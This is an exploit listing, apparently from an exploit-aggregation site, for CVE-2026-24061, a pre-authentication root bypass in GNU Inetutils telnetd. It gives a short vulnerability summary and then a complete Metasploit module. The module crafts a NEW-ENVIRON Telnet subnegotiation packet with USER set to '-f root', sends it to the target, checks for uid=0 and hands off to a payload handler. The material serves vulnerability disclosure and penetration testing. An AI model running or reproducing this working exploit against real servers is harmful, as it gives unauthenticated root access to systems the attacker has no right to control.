Share
## https://sploitus.com/exploit?id=PACKETSTORM:216448
=============================================================================================================================================
    | # Title     : GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass Root Access                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.gnu.org/software/inetutils/                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    :  A critical authentication bypass vulnerability has been identified in GNU Inetutils specifically affecting the telnetd service.
    
    The issue occurs due to improper validation of the NEW-ENVIRON Telnet subnegotiation option. By sending a specially crafted environment variable containing 
    
    the value -f root within the USER field, a remote attacker can force the service to invoke the system login process in a way that bypasses password authentication.
    
    Successful exploitation allows an unauthenticated remote attacker to gain root-level access over Telnet without providing valid credentials.
    
    The vulnerability is tracked as: CVE-2026-24061
    
    Impact
    
    Remote unauthenticated root access
    
    No brute force required
    
    No valid credentials required
    
    Full system compromise possible
    
    Severity
    
    Critical โ€“ Pre-Authentication Remote Code Execution / Privilege Escalation
    
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::Telnet
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'GNU Inetutils telnetd Authentication Bypass (Enhanced)',
          'Description'    => %q{
            This module exploits an authentication bypass vulnerability in GNU Inetutils telnetd.
            By sending a specially crafted NEW-ENVIRON subnegotiation with a USER variable
            containing '-f root', an attacker can login as root without a password.
            This occurs because telnetd passes the environment variable directly to the 
            login command without proper sanitization.
          },
          'Author'         => [ 'indoushka' ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2026-24061' ] # 
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'Space'    => 2000,
              'BadChars' => "",
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [ [ 'Automatic', { } ] ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Feb 20 2026',
          'Notes'          =>
            {
              'Stability'   => [ CRASH_SAFE ],
              'Reliability' => [ REPEATABLE_SESSION ],
              'SideEffects' => [ IOC_IN_LOGS ]
            }
        ))
    
        register_options(
          [
            Opt::RPORT(23),
            OptString.new('USER', [ true, "The target user to bypass (usually root)", 'root' ])
          ])
      end
    
      def exploit
    
        connect
    
        print_status("Waiting for server banner and negotiation...")
        banner = sock.get_once(-1, 5)
        if banner
          print_status("Target Banner: #{banner.strip}")
        end
        
        packet = "\xff\xfa\x27\x00"        
        packet << "\x00USER"               
        packet << "\x01-f #{datastore['USER']}" 
        packet << "\xff\xf0"                
    
        print_status("Sending bypass payload for user: #{datastore['USER']}...")
        sock.put(packet)
    
        Rex.sleep(1)
    
        sock.put("id\n")
        res = sock.get_once(-1, 5)
    
        if res && res =~ /uid=0/
          print_good("Success! Authenticated as root (uid=0).")
    
          handler
        else
          print_error("Failed to bypass authentication. Server might be patched or using PAM sanitization.")
        end
    
      rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
        print_error("Connection failed.")
      ensure
    
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================